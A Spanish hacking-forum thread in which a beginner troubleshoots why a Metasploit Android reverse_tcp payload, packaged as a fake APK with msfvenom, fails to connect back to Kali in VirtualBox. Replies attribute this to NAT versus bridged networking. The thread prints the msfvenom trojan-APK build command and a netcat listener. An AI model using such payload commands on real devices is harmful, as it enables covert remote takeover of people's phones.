problema configuracion LHOST-en kali linux (virtualbox)

  • 10 Respuestas
  • 2974 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DammZ

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Skype: deyzetayt
    • Ver Perfil
    • Email
Bueno el problema es el siguiente, quiero hacer una prueba de exploit con mi movil android para ver si funciona y el problema es cuando configuro el LHOST que no se que ip poner porque cuando pongo ifconfig me sale lo siguiente:

+eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe7d:8ba9  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:7d:8b:a9  txqueuelen 1000  (Ethernet)
        RX packets 34328  bytes 31173780 (29.7 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 13667  bytes 1195080 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 0  (Local Loopback)
        RX packets 28  bytes 1640 (1.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 28  bytes 1640 (1.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

La duda es que ip pongo en LHOST? Probe con 10.0.2.15 , 192.168.1.17(pc windows10) y 127.0.0.1

El otro problema es que cuando inicio el exploit y abro la aplicación falsa en mi teléfono móvil, no ocurre nada en la terminal... se queda igual que sin abrir la aplicación (Todo esto lo hago con metasploit(como es normal) )

Esto me pasa también con ataques a otros pc, se queda igual

Saludos y muchas gracias :)

PD: Por cierto mi conexion es por cable ethernet

« Última modificación: Agosto 25, 2016, 06:57:30 pm por [email protected] »

Desconectado PikachuDorado

  • *
  • Ex-Staff
  • *****
  • Mensajes: 372
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame
Pikaa~


Desconectado seth

  • *
  • Underc0der
  • Mensajes: 264
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
127.0.0.1 siempre apunta a la misma maquina
10.0.2.15 es la que tenes que usar
la otra no se de donde la sacaste

para probarlo hace esto:
en la computadora corre sudo nc -lvvp 80
en el celular abri el navegador y entra a You are not allowed to view links. Register or Login /
deberias ver una conexion en la consola donde abriste nc

Desconectado DammZ

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Skype: deyzetayt
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Me puedes explicar eso mas a fondo? Soy nuevo en esto de las máquinas virtuales

Desconectado DammZ

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Skype: deyzetayt
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
127.0.0.1 siempre apunta a la misma maquina
10.0.2.15 es la que tenes que usar
la otra no se de donde la sacaste

para probarlo hace esto:
en la computadora corre sudo nc -lvvp 80
en el celular abri el navegador y entra a You are not allowed to view links. Register or Login /
deberias ver una conexion en la consola donde abriste nc

No me sale nada en la consola, activo el comando , luego abro You are not allowed to view links. Register or Login / en el celular y no ocurre nada en la terminal :/

Desconectado Cl0udswX

  • *
  • Ex-Staff
  • *****
  • Mensajes: 887
  • Actividad:
    16.67%
  • Country: 00
  • Reputación 4
  • La fisica es el sistema operativo del universo.
  • Skype: cl0udzwx
  • Twitter: @UniversoSilicio
    • Ver Perfil
    • cl0udswz - Sequre
Entra al msfconsole y despues de configurar todas las variables, haz un :

Código: You are not allowed to view links. Register or Login
show options
Comparte la salida por aqui.

Me huele a que todo el problema es una mal configuracion de los puertos.
You are not allowed to view links. Register or Login
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Normalmente vbox reparte direcciones 192.168..1.0/24 pero igual deberia funcionarte con cualquier otra direccion privada como 10.0.0.0/8 y 172.16.0.0/16.

Saludos.
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.

Desconectado DammZ

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Skype: deyzetayt
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Entra al msfconsole y despues de configurar todas las variables, haz un :

Código: You are not allowed to view links. Register or Login
show options
Comparte la salida por aqui.

Me huele a que todo el problema es una mal configuracion de los puertos.
You are not allowed to view links. Register or Login
Sistema virtualizado? Eso es porque no tenes la conexión bien configurada. Deberías tener una dirección 192.168.x.x configura la placa de red desde el Virtual box ovmware y avisame

Normalmente vbox reparte direcciones 192.168..1.0/24 pero igual deberia funcionarte con cualquier otra direccion privada como 10.0.0.0/8 y 172.16.0.0/16.

Saludos.

Global Options:
===============

   Option            Current Setting    Description
   ------            ---------------    -----------
   ConsoleLogging    false              Log all console input and output
   LogLevel          0                  Verbosity of logs (default 0, max 3)
   MinimumRank       0                  The minimum rank of exploits that will run without explicit confirmation
   Prompt            msf                The prompt string
   PromptChar        >                  The prompt character
   PromptTimeFormat  %Y-%m-%d %H:%M:%S  Format for timestamp escapes in prompts
   SessionLogging    false              Log all input and output for sessions
   TimestampOutput   false              Prefix all console output with a timestamp


Me sale eso cuando pongo show options en msfconsole, como dijistes que funciona con la ip privada de 10.0.2.15 con esa ya probe y el archivo .apk al abrirse no hace nada la terminal no responde cuando se abre la apk

La apk fue creada en la terminal poniendo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9999(NO se si este es el adecuado si pueden recomendarme uno os lo agradeceria) R > android.apk

Desconectado Cl0udswX

  • *
  • Ex-Staff
  • *****
  • Mensajes: 887
  • Actividad:
    16.67%
  • Country: 00
  • Reputación 4
  • La fisica es el sistema operativo del universo.
  • Skype: cl0udzwx
  • Twitter: @UniversoSilicio
    • Ver Perfil
    • cl0udswz - Sequre
Ok a ver...

Tienes metasploit en una maquina virtual? o en un equipo normal?
El talento se parece al tirador que da en un blanco que los demás no pueden alcanzar; el genio se parece al tirador que da en un blanco que los demás no pueden ver.

Desconectado DammZ

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
  • Skype: deyzetayt
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Ok a ver...

Tienes metasploit en una maquina virtual? o en un equipo normal?

En una máquina virtual (virtualbox) , mi pc es un windows 10

Desconectado entei

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
    • Ver Perfil
Pudiste solucionar tu problema? me esta pasando lo mismo, no se que ip usar

Desconectado wh1t3.kn1ght

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Buenas,

Si tienen problermas con las IPS, cambien la configuracion de red en su virtualbox de NAT a BRIDGE, cuando usan BRIDGE, podran llegar no solo a las maquinas virtuales que tienen corriendo en su virtualbox, si no tambien a todas los dispositivos que esten conectados en su router osea de manera LAN.

Saludos.

 

[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 17866
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Debian o Linux mint debian edition

Iniciado por Krapermors

Respuestas: 3
Vistas: 4202
Último mensaje Agosto 12, 2013, 08:36:54 am
por Sanko
¿Alguien me podría explicar sobre "Character Device Files" en linux?

Iniciado por proxy_lainux

Respuestas: 2
Vistas: 3111
Último mensaje Mayo 07, 2016, 12:23:06 pm
por proxy_lainux
[SOLUCIONADO] ¿Sirve para pentesting "Huayra GNU/Linux 2.0"?

Iniciado por Doblez

Respuestas: 2
Vistas: 3145
Último mensaje Mayo 13, 2016, 08:44:59 pm
por Doblez
DUDA: Error al instalar LAMP en Linux Mint (Sonya) Cinnamon bajo Virtual Box

Iniciado por fleshworm

Respuestas: 1
Vistas: 2667
Último mensaje Agosto 26, 2017, 08:49:11 am
por fleshworm